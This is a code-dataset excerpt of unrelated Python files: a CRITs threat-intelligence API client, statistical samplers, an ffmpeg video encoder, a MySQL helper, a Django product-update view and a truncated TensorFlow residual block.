        'Actor': 'actors',
        'Email': 'emails',
        'Backdoor': 'backdoors',
    }

    def __init__(self, api_url='', api_key='', username='', verify=True,
                 proxies=None):
        self.url = api_url
        # endswith() also guards the empty-string default, which would raise
        # IndexError with the previous ``self.url[-1]`` check.
        if self.url.endswith('/'):
            self.url = self.url[:-1]
        self.api_key = api_key
        self.username = username
        self.verify = verify
        # Avoid the shared mutable-default-argument pitfall.
        self.proxies = proxies if proxies is not None else {}

    def get_object(self, obj_id, obj_type):
        """Fetch one CRITs object and return it as a dict, or None on failure.

        :param obj_id: CRITs ObjectId of the object to retrieve.
        :param obj_type: CRITs type name, e.g. 'Indicator' or 'Sample'.
        """
        type_trans = self._type_translation(obj_type)
        get_url = '{}/{}/{}/'.format(self.url, type_trans, obj_id)
        params = {
            'username': self.username,
            'api_key': self.api_key,
        }
        r = requests.get(get_url, params=params, proxies=self.proxies, verify=self.verify)
        if r.status_code == 200:
            return json.loads(r.text)
        # Use the module logger for consistency with the other methods
        # (previously this printed to stdout).
        log.error('Status code returned for query {}, '
                  'was: {}'.format(get_url, r.status_code))
        return None

    def add_indicator(self, source='', reference='', method='',
                      campaign=None, confidence=None, bucket_list=None, ticket='',
                      add_domain=True, add_relationship=True,
                      indicator_confidence='unknown', indicator_impact='unknown',
                      type=None, threat_type=itt.UNKNOWN, attack_type=iat.UNKNOWN,
                      value=None, description=''):
        """Upload a new indicator; return the parsed JSON response or None.

        Fixes vs. previous version: ``method``, ``add_domain`` and
        ``add_relationship`` are now actually sent (they used to be silently
        replaced with '' / True), and ``bucket_list`` no longer uses a shared
        mutable default.
        """
        data = {
            'api_key': self.api_key,
            'username': self.username,
            'source': source,
            'reference': reference,
            'method': method,
            'campaign': campaign,
            'confidence': confidence,
            'bucket_list': bucket_list if bucket_list is not None else [],
            'ticket': ticket,
            'add_domain': add_domain,
            'add_relationship': add_relationship,
            'indicator_confidence': indicator_confidence,
            'indicator_impact': indicator_impact,
            'type': type,
            'threat_type': threat_type,
            'attack_type': attack_type,
            'value': value,
            'description': description,
        }
        r = requests.post("{0}/indicators/".format(self.url), data=data,
                          verify=self.verify, proxies=self.proxies)
        if r.status_code == 200:
            log.debug("Indicator uploaded successfully - {}".format(value))
            return json.loads(r.text)
        return None

    def has_relationship(self, left_id, right_type=None, *args, **kwargs):
        raise NotImplementedError  # placeholder; see real definition below

    # NOTE: the placeholder above is removed; real implementation follows.
    def has_relationship(self, left_id, left_type, right_id, right_type,
                         rel_type='Related To'):
        """Return True when the left object already links to the right one.

        :raises CRITsOperationalError: when the left object cannot be fetched.
        """
        data = self.get_object(left_id, left_type)
        if not data:
            raise CRITsOperationalError('Crits Object not found with id {} and '
                                        'type {}'.format(left_id, left_type))
        if 'relationships' not in data:
            return False
        for relationship in data['relationships']:
            if (relationship['relationship'] == rel_type
                    and relationship['value'] == right_id
                    and relationship['type'] == right_type):
                return True
        return False

    def forge_relationship(self, left_id, left_type, right_id, right_type,
                           rel_type, rel_date='', rel_confidence='high',
                           rel_reason=''):
        """Create a relationship between two objects; return True on success."""
        if not rel_date:
            rel_date = datetime.datetime.now()
        type_trans = self._type_translation(left_type)
        submit_url = '{}/{}/{}/'.format(self.url, type_trans, left_id)
        params = {
            'api_key': self.api_key,
            'username': self.username,
        }
        data = {
            'action': 'forge_relationship',
            'right_type': right_type,
            'right_id': right_id,
            'rel_type': rel_type,
            'rel_date': rel_date,
            'rel_confidence': rel_confidence,
            'rel_reason': rel_reason
        }
        r = requests.patch(submit_url, params=params, data=data,
                           proxies=self.proxies, verify=self.verify)
        if r.status_code == 200:
            log.debug('Relationship built successfully: {0} <-> '
                      '{1}'.format(left_id, right_id))
            return True
        log.error('Error with status code {0} and message {1} between '
                  'these indicators: {2} <-> '
                  '{3}'.format(r.status_code, r.text, left_id, right_id))
        return False

    def add_campaign_to_object(self, id, type, campaign, confidence, analyst,
                               date, description):
        # TODO: Make sure the object does not already have the campaign.
        # Return if it does. Add it if it doesn't.
        # NOTE(review): this method is unfinished - ``self.db`` is never set by
        # __init__, so the lookup below cannot work yet. The leftover
        # pdb.set_trace() debugger breakpoint has been removed.
        obj = getattr(self.db, type)
        result = obj.find({'_id': id, 'campaign.name': campaign})
        if result:
            log.debug('Object {} already tagged with campaign {}'.format(id, campaign))

    def _type_translation(self, str_type):
        """Translate a CRITs type name to its API URL segment.

        :raises CRITsOperationalError: for an unrecognized type name.
        """
        try:
            return self._TYPE_ENDPOINTS[str_type]
        except KeyError:
            raise CRITsOperationalError('Invalid object type specified: '
                                        '{}'.format(str_type))
|
8,134 | f4e45c19105d4ee1520acc0cd61dadfe27904d0f | from sklearn.base import BaseEstimator
class movingAverage(BaseEstimator):
    '''Moving-average forecaster over the 'Values' column of self.data.

    Expects the host object to provide ``self.data`` (a DataFrame with a date
    index and a 'Values' column), ``self.length``, ``self.maxDate``,
    ``self.truncate`` and ``self.raiseError`` -- presumably set by a mixin or
    base pipeline class (TODO confirm).
    '''

    def __init__(self, lag):
        # Retained for estimator compatibility; the forecast window is
        # controlled by the ``periods`` argument of movingAverage() instead.
        self.lag = lag

    def movingAverage(self, periods=5):
        '''Append a p-period moving-average forecast column to self.data.

        Ex-post points (dates up to self.maxDate) use the trailing mean of the
        previous p observations; ex-ante points carry the last forecast
        forward. Returns True on success, False when history is too short.
        '''
        try:
            # sets data
            x = self.data['Values']
            d = self.data.index
            # sets variables
            N = x.size
            f = np.zeros((N,))
            p = int(periods)
            # check history
            if self.length < p:
                print('Moving Average: Not enough data for %s periods' % str(p))
                return False
            # seed the first p points with the observed values
            f[0:p] = x[0:p]
            for i in range(p, N):
                # ex-post: trailing mean of the previous p observations
                if d[i] <= self.maxDate:
                    f[i] = x[i - p:i].mean()
                # ex-ante: no new observations, repeat the last forecast
                else:
                    f[i] = f[i - 1]
            # truncate 0s
            if self.truncate:
                f[f < 0] = 0
            # set name
            colName = 'Moving Average %s' % p
            # add to data
            self.data[colName] = f
            return True
        except Exception as e:  # fixed Python-2-only ``except Exception, e``
            self.raiseError('Error in Moving Average: ' + str(e))
8,135 | c2f39e33030cbe7c5d4827b47fb28d7604bdbc6d | #Write your function here
def over_nine_thousand(lst):
    """Sum list entries, stopping as soon as the running total passes 9000."""
    total = 0
    for value in lst:
        total += value
        if total > 9000:
            break
    return total


# Demonstration: stops after 8000 + 900 + 120 -> prints 9020.
print(over_nine_thousand([8000, 900, 120, 5000]))
8,136 | 4c5db1af9fd1c9b09f6e64a44d72351807c0f7a5 | from functools import reduce
from math import (log, sqrt)
import matplotlib.pyplot as plt
import matplotlib.pylab as mlab
import numpy
import random
import scipy.stats
class Node:
    """Base class for a node in a Metropolis-Hastings sampling graph.

    Subclasses supply likelihood() (in log space) and, apparently, an
    in_support() predicate and an optional-argument likelihood -- see the
    review notes in sample(). A node proposes candidates from a normal
    distribution centred on its current value and accepts or rejects them
    against its own likelihood plus that of its children.
    """
    def __init__(
        self,
        name,
        val=None,
        observed=False,
        candidate_standard_deviation=1,
        save_samples=False
    ):
        self.name = name
        self.val = val
        # Observed nodes are clamped: sample() returns val unchanged.
        self.observed = observed
        self.candidate_standard_deviation = candidate_standard_deviation
        self.children = []
        # Accepted draws collected after burn-in.
        self.posteriors = []
        # Acceptance bookkeeping (only updated outside burn-in).
        self.rejected = 0
        self.stayed = 0
        self.accepted = 0
        #if save_samples:
        #    self.file = open(self.name, 'w')
        #else:
        #    self.file = None
    def likelihood(self):
        """Log-likelihood of the node's current value; subclasses override."""
        raise NotImplementedError
    def complete_conditional(self, target):
        # NOTE(review): ``target`` is unused; the sum is always taken at the
        # node's current state.
        return reduce(
            lambda l, child: l + child.likelihood(),
            self.children,
            self.likelihood()
        )
    def save_sample(self, val):
        # NOTE(review): self.file is never assigned (the code in __init__ is
        # commented out), so calling this would raise AttributeError.
        if self.file:
            self.file.write('{}\n'.format(self.val))
    def sample(self, isBurn=False):
        """Take one Metropolis-Hastings step and return the (possibly new) value.

        :param isBurn: when True, skip posterior/acceptance bookkeeping.
        """
        if self.observed:
            #self.save_sample()
            return self.val
        # get a candidate value
        cand = numpy.random.normal(self.val, self.candidate_standard_deviation)
        cand = self.cleanse_val(cand)
        #print(self.name, 'cand', cand)
        # NOTE(review): in_support() is not defined on this base class;
        # subclasses presumably provide it -- confirm.
        if not self.in_support(cand):
            #print('*****', self.name, 'reject', cand)
            if not isBurn:
                self.posteriors.append(self.val)
                self.rejected = self.rejected + 1
                self.stayed = self.stayed + 1
            #self.save_sample()
            return self.val
        old_val = self.val
        # NOTE(review): likelihood() is declared with no argument above but is
        # called with one here -- subclasses must accept an optional value.
        reject_likelihood = self.likelihood(old_val)
        accept_likelihood = self.likelihood(cand)
        # factor in the children with the current value
        for child in self.children:
            reject_likelihood += child.likelihood()
        # get the likelihood of the candidate value
        self.val = cand
        for child in self.children:
            accept_likelihood += child.likelihood()
        u = log(random.random())
        #print(self.name, 'r', reject_likelihood)
        #print(self.name, 'a', accept_likelihood)
        #print(self.name, 'u', u)
        # set it back if staying is more likely
        if u >= accept_likelihood - reject_likelihood:
            #print(self.name, 'set it back')
            self.val = old_val
            if not isBurn:
                self.stayed = self.stayed + 1
        else:
            #print(self.name, 'keep the cand', cand)
            if not isBurn:
                self.accepted = self.accepted + 1
        if not isBurn:
            self.posteriors.append(self.val)
        #self.save_sample()
        return self.val
    def cleanse_val(self, val):
        """Hook for subclasses to coerce a raw candidate; identity here."""
        return val
    # Need a function to handle the Add node's value retrieval
    def value(self):
        return self.val
    def add_child(self, child):
        self.children.append(child)
    def mixplot(self, write=False):
        """Trace plot of the posterior samples; saved as PNG when *write*."""
        if (len(self.posteriors) == 0):
            return
        xs, ys = zip(*enumerate(self.posteriors))
        plt.plot(xs, ys)
        if write:
            plt.savefig(self.name + '-mixplot.png')
            plt.close()
        else:
            plt.show()
    def plot_posterior(self, write=False):
        """Histogram of the posterior samples; saved as PNG when *write*."""
        if (len(self.posteriors) == 0):
            return
        #sample_min = min(self.posteriors)
        #sample_max = max(self.posteriors)
        #xs = mlab.frange(sample_min, sample_max, (sample_max - sample_min) / 100)
        #ys = [self.pdf(x) for x in xs]
        #plt.plot(xs, ys, label='Priot Dist ' + self.name)
        #plt.title('Prior Dist {}:{}'.format(self.name, self.candidate_standard_deviation))
        plt.title('Posterior {}'.format(self.name))
        plt.hist(self.posteriors, bins=30, normed=True, label="Posterior Dist " + self.name)
        if write:
            plt.savefig(self.name + '-posterior.png')
            plt.close()
        else:
            plt.show()
    def __add__(self, other):
        return Add(self, other)
    def __pow__(self, other):
        return Power(self, other)
class Add(Node):
    """Deterministic node whose value is the sum of its parent nodes."""

    def __init__(self, *args):
        # Promote raw numbers to Fixed nodes so every parent exposes value().
        self.parents = [
            arg if isinstance(arg, Node)
            else Fixed('Fixed ({})'.format(arg), val=arg)
            for arg in args
        ]
        Node.__init__(
            self,
            ':'.join([parent.name for parent in self.parents]) + ' (Add)',
        )

    def add_child(self, child):
        # Delegate: children depend on the operands, not on this node itself.
        for parent in self.parents:
            parent.add_child(child)

    def value(self):
        total = 0
        for parent in self.parents:
            total += parent.value()
        return total
# The purpose of this node is to just have something that gives a fixed value
# With a probability of 1. This is useful for priors.
class Fixed(Node):
    """Node holding a constant value with probability 1 (useful for priors)."""

    def __init__(self, name, val=None):
        Node.__init__(self, name + ' (Fixed)', val=val)

    def likelihood(self):
        # Log space: log(1) == 0.
        return 0
class Power(Node):
    """Deterministic node whose value is base ** exponent."""

    def __init__(self, base, exponent):
        # Promote plain numbers to Fixed nodes so both operands are Nodes.
        self.base = (base if isinstance(base, Node)
                     else Fixed('base {}'.format(base), val=base))
        self.exponent = (exponent if isinstance(exponent, Node)
                         else Fixed('exponent {}'.format(exponent), val=exponent))
        Node.__init__(
            self,
            '{}:{} (Pow)'.format(self.base.name, self.exponent.name),
        )
        self.parents = [self.base, self.exponent]

    def add_child(self, child):
        # Delegate: children depend on the operands, not on this node itself.
        for parent in self.parents:
            parent.add_child(child)

    def value(self):
        return self.base.value() ** self.exponent.value()
|
8,137 | 575768c200ad81f878c132d68569c84f497091f2 | import xml.etree.ElementTree as ET
class Stage:
    """Container for the top-level pieces of a project stage."""

    def __init__(self, costumes, sounds, variables, blocks, scripts, sprites):
        # Media assets.
        self.costumes = costumes
        self.sounds = sounds
        # Program state and behaviour.
        self.variables = variables
        self.blocks = blocks
        self.scripts = scripts
        # Child sprites belonging to this stage.
        self.sprites = sprites
class Sprite:
    """Value object describing a single sprite's placement and appearance."""

    def __init__(
        self, name : str,
        index : str, xCoord : int,
        yCoord : int, heading : int,
        scale : float, volume : int,
        pan : int, rotation : int,
        draggable : bool, hidden : bool,
        costumes : str, color : (float, float, float),
        pen : str, id : int
    ):
        # Identity.
        self.name = name
        self.index = index
        self.id = id
        # Placement and orientation.
        self.coords = (xCoord, yCoord)
        self.heading = heading
        self.rotation = rotation
        self.scale = scale
        # Audio.
        self.volume = volume
        self.pan = pan
        # Interaction flags.
        self.draggable = draggable
        self.hidden = hidden
        # Appearance.
        self.costumes = costumes
        self.color = color
        self.pen = pen
|
8,138 | 163475bbe8a5b6eb161e2bb7e9b9a9a3ea0879d2 | import logging
from subprocess import Popen, PIPE
from .exceptions import VideoEncodingError, WrongVideoTypeError
# TODO: Create a switchable encoding engine.
logger = logging.getLogger('video.encoding')
# Base ffmpeg invocation; the input path is appended right after '-i'.
cmd_ffmpeg = [
    'ffmpeg',
    '-i',
]
# 640x360 H.264/AAC MP4 output; -y overwrites an existing destination.
cmd_mp4 = [
    '-vf', 'scale=640:360',
    '-vcodec', 'h264',
    '-acodec', 'aac',
    '-y',
]
# 640x360 VP9 WebM output (yuv420p for broad player compatibility).
cmd_webm = [
    '-vf', 'scale=640:360',
    '-c:v', 'libvpx-vp9',
    '-pix_fmt', 'yuv420p',
    '-y',
]
# cmd_webm = [
#     '-c:v'
#     '-vf', 'scale=640:360',
#     '-vcodec', 'libvpx',
#     '-acodec', 'libvorbis',
#     '-y',
# ]
# Single 640x360 JPEG thumbnail taken one second into the video.
cmd_jpg = [
    '-frames', '1',
    '-s', '640x360',
    '-ss', '1',
    '-y',
]
# Output-type name -> ffmpeg argument list used by encode_video_file().
codecs = {
    'jpg': cmd_jpg,
    'mp4': cmd_mp4,
    'webm': cmd_webm,
}
def _run_cmd(cmds):
try:
return Popen(
cmds,
shell=False,
close_fds=True,
stdin=PIPE,
stdout=PIPE,
stderr=PIPE,
)
except OSError as ex:
raise VideoEncodingError('Video running error.') from ex
def encode_video_file(src_filname, dst_filename, file_type):
    """Encode *src_filname* into *dst_filename* for the given target type.

    :param file_type: One of the ``codecs`` keys ('jpg', 'mp4', 'webm').
    :raises WrongVideoTypeError: for an unknown ``file_type``.
    :raises VideoEncodingError: when ffmpeg exits with a non-zero status.
    :returns: ffmpeg's return code (always 0 on success).
    """
    logger.info(
        'Source file: %s, Destination file: %s, File Type: %s',
        src_filname, dst_filename, file_type
    )
    try:
        cmd = codecs[file_type]
    except KeyError:
        # Bug fix: a dict lookup raises KeyError, not IndexError, so unknown
        # types previously crashed instead of raising WrongVideoTypeError.
        raise WrongVideoTypeError('Wrong video type.')
    process = _run_cmd(
        cmd_ffmpeg + [src_filname] + cmd + [dst_filename],
    )
    # TODO: timeout handling here.
    stdout, stderr = process.communicate()
    returncode = process.returncode
    if returncode != 0:
        logger.error(
            'ffmpeg returncode %d, args: %s, output: %s',
            returncode,
            process.args,
            stderr.decode(),
        )
        raise VideoEncodingError('Video encoding error.')
    return returncode
|
8,139 | 80ad4459436e2e1cc44509e7dae18d1539bf2bc0 | import pymysql
class DB:
    """Context-managed pymysql helper bound to a single database.

    :param db_: Database (schema) name to connect to.
    :param charset: Connection character set; defaults to utf8.
    """

    def __init__(self, host='localhost', port=3306, db_='test', user='wj',
                 passwd='', charset='utf8'):
        self.db = db_
        self.conn = pymysql.connect(host=host, port=port, db=db_, user=user, passwd=passwd, charset=charset)
        # DictCursor so rows come back as column-name -> value mappings.
        self.cur = self.conn.cursor(cursor=pymysql.cursors.DictCursor)

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Commit, then release cursor and connection in order.
        self.conn.commit()
        self.cur.close()
        self.conn.close()

    def write(self, data):
        """Insert *data* into column ``a`` of table ``data``.

        Bug fix: the value is now passed as a query parameter instead of being
        interpolated into the SQL string, which broke on quotes and was an
        SQL-injection vector.
        """
        sql = "INSERT INTO {}({}) VALUES (%s)".format('data', 'a')
        self.cur.execute(sql, (data,))
        self.conn.commit()

    def read(self):
        """Return column ``a`` of the first row of table ``data``.

        :raises IndexError: when the table is empty (unchanged behavior).
        """
        sql = "SELECT * FROM {}".format('data')
        self.cur.execute(sql)
        results = self.cur.fetchall()
        return results[0]['a']
if __name__ == '__main__':
    # Round-trip smoke test: store a list's repr, read it back, slice it.
    test = [1, 2, 3, 4, 5, 6, 7]
    with DB() as db:
        db.write(str(test))
        # NOTE(review): eval() on database contents executes arbitrary code if
        # anything else can write this table; ast.literal_eval would be safer.
        a = eval(db.read())
        print(a[2:])
|
8,140 | 47e9b73fc7f6b3c8295e78d0cdb5aa51ca4c5f8d | from rest_framework.generics import GenericAPIView
from rest_framework.response import Response
from rest_framework.status import HTTP_400_BAD_REQUEST, HTTP_404_NOT_FOUND
from ...models.brand import Brand
from ...models.product import type_currency_choices, type_condition_choices, User, Product
from ...models.product_color import color_choices, Product_Color
from ...models.product_size import type_size_choices, Product_Size
from ...models.product_image import Product_Image
from ...models.product_specification import Product_Specification
from ...models.product_platform import Product_Platform
from ...models.product_recommended_use import Product_Recommended_Use
from ...models.product_terms_condition import Product_Terms_Condition
from ...serilaizers.products.updateSerializer import UpdateSerializer
from ...serilaizers.products.specificationSerializer import SpecificationSerializer
from ...serilaizers.products.imageSerializer import ImageSerializer
from ...serilaizers.products.colorSerializer import ColorSerializer
from ...serilaizers.products.platformSerializer import PlatformSerializer
from ...serilaizers.products.recommendedUseSerializer import RecommendedUseSerializer
from ...serilaizers.products.sizeSerializer import SizeSerializer
from ...serilaizers.products.termConditionSerializer import TermConditionSerializer
class UpdateProduct(GenericAPIView):
    """API view that reads (GET) and updates (PUT) a single Product plus all
    of its related records (specifications, images, colors, sizes, platform,
    recommended use, terms & conditions)."""
    serializer_class = UpdateSerializer
    # Cached per-request Product instance, set by put().
    _product_obj = None
    # NOTE(review): evaluated once at import time; new brands added later will
    # not appear until the process restarts.
    _brands = Brand.objects.values("id", "name")
    def get(self, request, *args, **kwargs):
        """Return the product's current data for the edit form."""
        data = self.get_queryset()
        # NOTE(review): data.id is accessed before the truthiness check below,
        # so a missing product (get_queryset() -> False) raises AttributeError
        # here rather than returning the 404 branch.
        extract_sp = self.extract_filter_data(Product_Specification.objects.values(
            "name", "value").filter(product=data.id))
        extract_img = self.extract_filter_data(
            Product_Image.objects.values('image').filter(product=data.id))
        if data:
            return Response(self.get_data({
                "product": data,
                "specific": extract_sp,
                "img": extract_img
            }))
        else:
            return Response({"errors": False}, status=HTTP_404_NOT_FOUND)
    def extract_filter_data(self, data):
        """Materialize a queryset (or any iterable) into a plain list."""
        arr = []
        for i in data:
            arr.append(i)
        return arr
    def get_extra_data(self, id):
        """Collect the optional one-to-many attributes of product *id*.

        Returns a dict with only the attributes that exist, or False when the
        product has none of them.
        """
        extra_data = {}
        pl = Product_Platform.objects.values(
            'platform').filter(product=id)
        col = Product_Color.objects.values('color').filter(product=id)
        siz = Product_Size.objects.values(
            'size', 'type_size').filter(product=id)
        recom = Product_Recommended_Use.objects.values(
            'recommended_use').filter(product=id)
        terms = Product_Terms_Condition.objects.values(
            'terms_condition').filter(product=id)
        if pl.exists():
            extra_data['platform'] = self.extract_filter_data(pl)
        if col.exists():
            extra_data['color'] = self.extract_filter_data(col)
        if siz.exists():
            extra_data['size'] = self.extract_filter_data(siz)
        if recom.exists():
            extra_data['recom_use'] = self.extract_filter_data(recom)
        if terms.exists():
            extra_data['term_condition'] = self.extract_filter_data(terms)
        if extra_data:
            return extra_data
        else:
            return False
    def get_queryset(self):
        """Return the Product addressed by the URL pk, or False if missing."""
        try:
            return Product.objects.get(id=self.kwargs['pk'])
        # NOTE(review): bare except hides all errors (DB outages included);
        # catching Product.DoesNotExist would be safer.
        except:
            return False
    def put(self, request, *args, **kwargs):
        """Validate then persist main data, and extra data when present."""
        self._product_obj = self.get_queryset()
        data = self.prepare_data(self.request.data, self.request.FILES)
        main = self.validate_main_data(data)
        if 'errors' in main:
            return Response(main['errors'], status=HTTP_400_BAD_REQUEST)
        else:
            extra = self.validate_extra_data(data)
            if extra:
                if 'errors' in extra:
                    return Response(extra['errors'], status=HTTP_400_BAD_REQUEST)
                else:
                    main = self.update_main_data(data, main)
                    self.update_extra_data(data, extra)
                    return Response(self.get_data(main))
            # No extra data submitted: still run the delete-if-removed pass.
            self.update_extra_data(data, False)
            main = self.update_main_data(data, main)
            return Response(self.get_data(main))
    def get_data(self, main):
        """Build the response payload for both GET and successful PUT."""
        return {
            # NOTE(review): hard-coded to the 'root' user - confirm intended.
            "user": User.objects.values('id', 'username').get(username="root"),
            "name": main['product'].title,
            "brand": main['product'].brand.id,
            "quantity": main['product'].quantity,
            "price": main['product'].price,
            "currency": main['product'].currency,
            "condition": main['product'].condition,
            "description": main['product'].description,
            "brands": self._brands,
            "conditions": type_condition_choices,
            "currencys": type_currency_choices,
            "colors": color_choices,
            "sizes": type_size_choices,
            "specific": self.extract_filter_data(main['specific']),
            "images": self.extract_filter_data(main['img']),
            "extra_data": self.get_extra_data(main['product'].id)
        }
    def prepare_data(self, data, img_data=None):
        # prepared the data extract all data from request and loads using json
        # extract images from request files and
        # return data as a dict
        from json import loads
        data = data['data']
        data = loads(data)
        # Re-key current images by the numeric suffix of their field name.
        data['img_current'] = {
            i.split("_")[2]: data['img_current'][i] for i in data['img_current']}
        if len(img_data) > 0:
            img = {i.split("_")[1]: img_data[i] for i in img_data}
            data['images'] = img
        return data
    def update_main_data(self, data, ser_data):
        """Persist product fields, specifications and replaced images."""
        pro = ser_data['product'].update(self._product_obj, data)
        for i in data['specific']:
            # 'current' marks an existing spec row; otherwise create a new one.
            if 'current' in i:
                if i['current'] != i['name']:
                    ser_data['specific'].update(Product_Specification.objects.get(
                        product=self._product_obj.id, name=i['current']), i)
            else:
                i['product'] = self._product_obj
                ser_data['specific'].create(i)
        if 'images' in data:
            img = data['images']
            for i in img['images']:
                ser_data['image'].update(
                    Product_Image.objects.get(
                        product=self._product_obj.id,
                        image=img['current'][i]), img['images'][i])
        return {
            "product": pro,
            "specific": Product_Specification.objects.values('name', 'value').filter(product=pro.id),
            "img": Product_Image.objects.values('image').filter(product=pro.id)
        }
    def update_extra_data(self, data, ser_data):
        """Create/update each optional attribute, deleting ones the client
        removed (absent from *ser_data*)."""
        extra_d = {}
        if ser_data and ('color' in ser_data):
            if 'current' in data['color']:
                # Colors changed: wipe and recreate the full set.
                if data['color']['current'] != data['color']['color']:
                    Product_Color.objects.filter(
                        product=self._product_obj.id).delete()
                    for i in data['color']['color']:
                        ser_data['color'].create(
                            {"product": self._product_obj, 'color': i})
            else:
                for i in data['color']['color']:
                    ser_data['color'].create(
                        {"product": self._product_obj, 'color': i})
        else:
            col = Product_Color.objects.filter(
                product=self._product_obj.id)
            if col.exists():
                col.delete()
        if ser_data and ('size' in ser_data):
            siz = data['size']['size'][0]
            typ = data['size']['size'][1]
            if 'current' in data['size']:
                cur_siz = data['size']['current'][0]
                cur_typ = data['size']['current'][1]
                if siz != cur_siz:
                    ser_data['size'].update(Product_Size.objects.get(
                        product=self._product_obj.id), {"size": siz, "type_size": typ})
                elif typ != cur_typ:
                    ser_data['size'].update(Product_Size.objects.get(
                        product=self._product_obj.id), {"size": siz, "type_size": typ})
            else:
                ser_data['size'].create(
                    {"product": self._product_obj, "size": siz, "type_size": typ})
        else:
            siz = Product_Size.objects.filter(
                product=self._product_obj.id)
            if siz.exists():
                siz.delete()
        if ser_data and ('platform' in ser_data):
            if 'platform_current' in data:
                if data['platform_current'] != data['platform']:
                    extra_d['platform'] = ser_data['platform'].update(Product_Platform.objects.get(
                        product=self._product_obj.id), data['platform'])
            else:
                extra_d['platform'] = ser_data['platform'].create(
                    {"product": self._product_obj, "platform": data['platform']})
        else:
            pl = Product_Platform.objects.filter(
                product=self._product_obj.id)
            if pl.exists():
                pl.delete()
        if ser_data and ('recom_use' in ser_data):
            if 'recom_use_current' in data:
                if data['recom_use_current'] != data['recom_use']:
                    extra_d['recom_use'] = ser_data['recom_use'].update(Product_Recommended_Use.objects.get(
                        product=self._product_obj.id), data['recom_use'])
            else:
                extra_d['recom_use'] = ser_data['recom_use'].create(
                    {"product": self._product_obj, "recommended_use": data['recom_use']})
        else:
            recom = Product_Recommended_Use.objects.filter(
                product=self._product_obj.id)
            if recom.exists():
                recom.delete()
        if ser_data and ('term_condition' in ser_data):
            if 'term_condition_current' in data:
                if data['term_condition_current'] != data['term_condition']:
                    extra_d['term_condition'] = ser_data['term_condition'].update(
                        Product_Terms_Condition.objects.get(product=self._product_obj.id), data['term_condition'])
            else:
                extra_d['term_condition'] = ser_data['term_condition'].create(
                    {"product": self._product_obj, "terms_condition": data['term_condition']})
        else:
            terms = Product_Terms_Condition.objects.filter(
                product=self._product_obj.id)
            if terms.exists():
                terms.delete()
        extra_d['color'] = Product_Color.objects.filter(
            product=self._product_obj.id)
        extra_d['size'] = Product_Size.objects.filter(
            product=self._product_obj.id)
        return extra_d
    def validate_main_data(self, data):
        """Validate product, specification and image serializers; return the
        bound serializers on success, or {'errors': ...} on failure."""
        pro_ser = UpdateSerializer(instance=self._product_obj, data=data)
        ser_data = {}
        if pro_ser.is_valid():
            ser_data['product'] = pro_ser
            sp = self.validate_specification(
                self._product_obj, data['specific'])
            if isinstance(sp, SpecificationSerializer):
                ser_data['specific'] = sp
                if 'images' in data:
                    data['images'] = {"images": data['images'],
                                      'current': data['img_current']}
                    img = self.validate_image(
                        self._product_obj, data['images'])
                    if isinstance(img, ImageSerializer):
                        ser_data['image'] = img
                        return ser_data
                    else:
                        return{"errors": img}
                else:
                    return ser_data
            else:
                return {"errors": sp}  # return error
        else:
            return {"errors": pro_ser.errors}
    def validate_extra_data(self, data):
        """Validate whichever optional attributes are present; returns the
        serializers, {'errors': ...} on first failure, or False when none."""
        ser_data = {}
        if 'color' in data:
            col = self.validate_color(data['color']['color'])
            if isinstance(col, ColorSerializer):
                ser_data['color'] = col
            else:
                return {"errors": col}
        if 'size' in data:
            siz = self.validate_size(data['size']['size'])
            if isinstance(siz, SizeSerializer):
                ser_data['size'] = siz
            else:
                return {"errors": siz}
        if 'platform' in data:
            pl = PlatformSerializer(data={"platform": data['platform']})
            if pl.is_valid():
                ser_data['platform'] = pl
            else:
                return {"errors": pl.errors}
        if 'recom_use' in data:
            recom = RecommendedUseSerializer(
                data={"recommended_use": data['recom_use']})
            if recom.is_valid():
                ser_data['recom_use'] = recom
            else:
                return {"errors": recom.errors}
        if 'term_condition' in data:
            term = TermConditionSerializer(
                data={"terms_condition": data['term_condition']})
            if term.is_valid():
                ser_data['term_condition'] = term
            else:
                return {"errors": term.errors}
        if ser_data:
            return ser_data
        else:
            return False
    def validate_specification(self, pro, data):
        # NOTE(review): only the last serializer instance is returned; earlier
        # rows are validated but their bound serializers are discarded.
        for i in data:
            sp = SpecificationSerializer(
                data={"name": i['name'], "value": i['value']})
            if not sp.is_valid():
                return sp.errors
        return sp
    def validate_image(self, pro, data):
        """Validate each uploaded image; errors dict on first failure."""
        for i in data['images']:
            img = ImageSerializer(data={"image": data['images'][i]})
            if not img.is_valid():
                return img.errors
        return img
    def validate_color(self, data):
        """Validate each color choice; errors dict on first failure."""
        for i in data:
            col = ColorSerializer(data={"color": i})
            if not col.is_valid():
                return col.errors
        return col
    def validate_size(self, data):
        """Validate a (size, type_size) pair; errors dict on failure."""
        size = SizeSerializer(data={"size": data[0],
                                    "type_size": data[1]})
        if not size.is_valid():
            return size.errors
        return size
|
8,141 | e626a7f3f9241db8684c3b8c1bd79ea49e03490d | import tensorflow as tf
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers, Sequential, optimizers
import numpy as np
from tensorflow.compat.v1.keras.backend import set_session
# Configure the TF1-compat session so GPU memory is allocated on demand and
# op placement is logged, then install it as the Keras backend session.
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True  # dynamically grow the memory used on the GPU
config.log_device_placement = True  # to log device placement (on which device the operation ran)
sess = tf.compat.v1.Session(config=config)
set_session(sess)
print('\nTensorflow GPU installed: ' + str(tf.test.is_built_with_cuda()))
print('Is Tensorflow using GPU: \n' + str(tf.test.is_gpu_available()))
class BasicBlock(layers.Layer):
    """1-D residual block: two conv/BN/ReLU units plus a shortcut branch."""

    def __init__(self, filter_num, kernel_size, strides=1):
        super(BasicBlock, self).__init__()
        # First convolution unit (may downsample via strides).
        self.conv1 = layers.Conv1D(filter_num, kernel_size, strides=strides, padding='same')
        self.bn1 = layers.BatchNormalization()
        self.relu1 = layers.Activation('relu')
        # Second convolution unit always keeps the sequence length.
        self.conv2 = layers.Conv1D(filter_num, kernel_size, strides=1, padding='same')
        self.bn2 = layers.BatchNormalization()
        self.relu2 = layers.Activation('relu')
        # Shortcut: a 1x1 convolution matches shapes when downsampling,
        # otherwise the identity is used.
        if strides != 1:
            self.downsample = Sequential()
            self.downsample.add(layers.Conv1D(filter_num, 1, strides=strides))
        else:
            self.downsample = lambda x: x

    def call(self, inputs, training=None):
        # Main branch: conv -> BN -> ReLU, twice.
        x = self.relu1(self.bn1(self.conv1(inputs)))
        x = self.relu2(self.bn2(self.conv2(x)))
        # Merge with the shortcut branch and apply the final activation.
